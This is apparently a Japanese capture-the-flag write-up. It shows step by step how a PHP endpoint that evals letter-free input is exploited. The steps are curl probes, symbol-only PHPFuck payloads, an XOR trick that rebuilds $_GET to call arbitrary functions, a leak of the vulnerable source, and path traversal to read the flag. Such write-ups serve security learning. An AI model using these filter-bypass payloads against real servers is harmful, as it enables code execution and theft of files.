You must defeat and pass through many enemies to get to it, and even then, what you desire could only be called upon with great hardship
Click here
アクセスしても以下のメッセージが表示されるだけであった。
$ curl https://ch7.sbug.se/
No 'command' param received.
指示されたパラメータを含めるが怒られる。
$ curl https://ch7.sbug.se/?command=whoami
Are you trying to inject malicious code?!
$ curl https://ch7.sbug.se/?command=a
Are you trying to inject malicious code?!
文字が何も与えられないわけもないので、試していると以下のように記号は通るようだった。
$ curl "https://ch7.sbug.se/?command=@" --head
HTTP/2 500
~~~
$ curl "https://ch7.sbug.se/?command='" --head
HTTP/2 500
~~~
500なので困っていると;
で200が返ってきた。
$ curl 'https://ch7.sbug.se/?command=;' --head
HTTP/2 200
~~~
コードが実行できそうなので、配列などを試す。
$ curl 'https://ch7.sbug.se/?command=[]^[];' --head
HTTP/2 200
~~~
実行できている。
ここでPHPFuckを思い出す。
//printf
(([]^[[]]).[][[]]^([].[])[([]^[])]).(([].[])[([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])])
//Satoki
(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])])
//printf(Satoki)
((([]^[[]]).[][[]]^([].[])[([]^[])]).(([].[])[([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]))((([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]))
エンコードして実行する。
$ curl 'https://ch7.sbug.se/?command=%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29;'
Satoki
任意のコードを実行すればよいが、長すぎるので英文字を使えるようにする。
$_ = "_GET"
が$_="`{{{"^"?<>/";
で表せると知られている。
$_GET[_]($_GET[__]($_GET[___]))
とし、printf(file_get_contents(index.php))
を行う。
GETを消去すると、$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));
となるのでアクセスし、ファイルを取得する。
#https://ch7.sbug.se/?command=$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));&_=printf&__=file_get_contents&___=index.php
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=index.php'
<?php
$EOL_W = "\r\n"; // Windows CR+LF
$EOL_L = "\n"; // Linux LF
if(isset($_GET["command"])){
$_GET["command"] = str_replace($EOL_W, "", $_GET["command"]);
$_GET["command"] = str_replace($EOL_L, "", $_GET["command"]);
if(!preg_match("/[A-Za-z0-9]/is", $_GET["command"])){
eval($_GET["command"]);
}else{
die("Are you trying to inject malicious code?!");
}
}else{
die("No 'command' param received.");
}
?>
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../../flag'
SBCTF{7h3r3_4nd_B4ck_4g41n}
たどっていくとflagが運良く手に入った。
場所がわからない場合はコマンド実行すればよい。